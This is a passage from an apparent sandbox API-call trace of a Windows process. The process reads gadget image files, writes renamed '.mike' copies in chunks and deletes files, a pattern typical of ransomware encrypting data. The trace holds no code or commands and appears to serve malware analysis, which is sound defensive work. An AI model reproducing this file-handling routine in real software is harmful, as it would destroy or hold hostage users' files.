lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21758a4*, lpNumberOfBytesRead=0x2af080*=0xd8, lpOverlapped=0x0) returned 1 [0102.610] CloseHandle (hObject=0x288) returned 1 [0102.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.610] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.610] GetFileType (hFile=0x288) returned 0x1 [0102.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.610] GetFileType (hFile=0x288) returned 0x1 [0102.610] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0102.610] WriteFile (in: hFile=0x288, lpBuffer=0x2178af8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2178af8*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0102.611] CloseHandle (hObject=0x288) returned 1 [0102.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.611] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.611] GetFileType (hFile=0x288) returned 0x1 [0102.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.611] GetFileType (hFile=0x288) returned 0x1 [0102.612] WriteFile (in: hFile=0x288, lpBuffer=0x217bd24*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x217bd24*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.612] CloseHandle (hObject=0x288) returned 1 [0102.612] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.612] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.612] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6740ca0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6740ca0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6740ca0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0102.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.612] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.613] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x217d4ac | out: lpFileInformation=0x217d4ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6740ca0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6740ca0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6740ca0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0102.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.613] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", dwFileAttributes=0x80) returned 0 [0102.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.614] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6740ca0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6740ca0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6740ca0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0102.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0102.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.614] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike")) returned 1 [0102.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0102.615] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0102.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0102.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0102.624] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.624] GetFileType (hFile=0x288) returned 0x1 [0102.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0102.624] GetFileType (hFile=0x288) returned 0x1 [0102.624] CloseHandle (hObject=0x288) returned 1 [0102.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.624] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0102.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0102.624] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0102.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.624] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png"), fInfoLevelId=0x0, lpFileInformation=0x217fce4 | out: lpFileInformation=0x217fce4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824845cf, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824845cf, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8d6)) returned 1 [0102.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.625] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png"), fInfoLevelId=0x0, lpFileInformation=0x218003c | out: lpFileInformation=0x218003c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824845cf, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824845cf, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8d6)) returned 1 [0102.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x58 [0102.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.625] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0102.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x58 [0102.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0102.625] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0102.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0102.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x58 [0102.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.626] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.626] GetFileType (hFile=0x288) returned 0x1 [0102.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.626] GetFileType (hFile=0x288) returned 0x1 [0102.626] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0102.626] WriteFile (in: hFile=0x288, lpBuffer=0x2181048*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2181048*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.627] CloseHandle (hObject=0x288) returned 1 [0102.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0102.627] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png"), fInfoLevelId=0x0, lpFileInformation=0x2180ae4 | out: lpFileInformation=0x2180ae4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824845cf, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824845cf, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8d6)) returned 1 [0102.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0102.627] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0102.627] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.628] GetFileType (hFile=0x288) returned 0x1 [0102.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0102.628] GetFileType (hFile=0x288) returned 0x1 [0102.628] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0102.628] ReadFile (in: hFile=0x288, lpBuffer=0x2182198, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2182198*, lpNumberOfBytesRead=0x2af080*=0x8d6, lpOverlapped=0x0) returned 1 [0102.629] CloseHandle (hObject=0x288) returned 1 [0102.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x58 [0102.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.630] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.630] GetFileType (hFile=0x288) returned 0x1 [0102.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.630] GetFileType (hFile=0x288) returned 0x1 [0102.630] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0102.630] WriteFile (in: hFile=0x288, lpBuffer=0x2188594*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2188594*, lpNumberOfBytesWritten=0x2af074*=0x8e0, lpOverlapped=0x0) returned 1 [0102.630] CloseHandle (hObject=0x288) returned 1 [0102.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x58 [0102.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.631] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.631] GetFileType (hFile=0x288) returned 0x1 [0102.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.631] GetFileType (hFile=0x288) returned 0x1 [0102.632] WriteFile (in: hFile=0x288, lpBuffer=0x218b7e8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x218b7e8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.632] CloseHandle (hObject=0x288) returned 1 [0102.632] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.632] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x58 [0102.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.632] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6766e00, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6766e00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6766e00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xb00)) returned 1 [0102.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.632] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec6c, 